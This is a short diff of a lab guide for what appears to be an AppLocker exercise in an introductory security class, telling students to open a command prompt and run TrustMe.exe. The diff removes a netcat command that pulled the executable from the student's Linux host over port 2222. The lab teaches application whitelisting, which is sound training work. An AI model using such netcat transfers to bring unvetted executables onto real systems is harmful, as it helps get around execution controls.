strandjs/IntroLabs/IntroClassFiles/Tools/IntroClass/AppLocker/AppLocker.md

 First, let's open a Windows command prompt.
 Simply select the down carrot from the Windows Terminal and select Command Prompt.

-Once the prompt is open, let's run the following commands to copy over and run the TrustMe.exe file.
+Once the prompt is open, let's run the following commands to run the TrustMe.exe file.

 `cd \tools`

-`nc <Your Linux IP> 2222 > TrustMe.exe`

 Take a deep breath.
 Count to 5.
 Then hit Ctrl+c to kill the connection.